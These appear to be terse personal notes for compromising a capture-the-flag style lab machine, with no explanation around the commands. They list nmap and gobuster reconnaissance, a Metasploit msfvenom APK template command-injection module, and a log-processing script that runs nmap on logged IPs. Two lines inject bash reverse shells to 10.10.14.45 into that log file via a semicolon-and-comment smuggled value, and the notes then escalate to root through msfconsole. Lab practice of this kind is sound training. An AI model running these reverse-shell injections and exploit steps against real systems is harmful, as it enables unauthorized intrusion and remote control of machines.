nmap -sV -sC -Pn 10.129.95.150 > nmap.txt
nmap -p-  10.129.95.150 > nmapall.txt
gobuster dir -u http://10.129.95.150:5000  -w /usr/share/dirb/wordlists/common.txt > gobuster.txt

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

10.10.14.45
echo " ;/bin/bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.45/5555 0>&1' #" >> hackers


cat $log | cut -d' ' -f3- | sort -u | while read ip;
do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

提權到pwn
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.45/1234 0>&1' #">> hackers

提權到root
msfconsole 執行/bin/bash